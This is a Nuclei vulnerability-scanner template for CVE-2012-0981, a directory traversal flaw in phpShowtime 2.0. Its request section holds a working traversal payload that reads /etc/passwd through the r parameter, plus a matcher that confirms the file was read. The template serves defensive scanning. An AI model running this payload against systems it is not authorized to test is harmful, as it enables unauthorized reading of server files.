nuclei-templates/http/cves/2012/CVE-2012-0981.yaml

46 lines
1.7 KiB
YAML

id: CVE-2012-0981
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: medium
description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
impact: |
An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
remediation: |
Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability.
reference:
- https://www.exploit-db.com/exploits/18435
- https://nvd.nist.gov/vuln/detail/CVE-2012-0981
- http://www.exploit-db.com/exploits/18435
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72824
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2012-0981
cwe-id: CWE-22
epss-score: 0.01277
epss-percentile: 0.85703
cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: kybernetika
product: phpshowtime
tags: cve,cve2012,phpshowtime,edb,lfi,kybernetika
http:
- method: GET
path:
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a004830460221009c6a4cabb72bde21bb132b44816b1bd64c1146b68963391fc45f78f2a847cb35022100eba1ae097bcc852f6d363e8f7d8fd65ced366197f06c5f1967617a378dd2752f:922c64590222798bb761d5b6d8e72950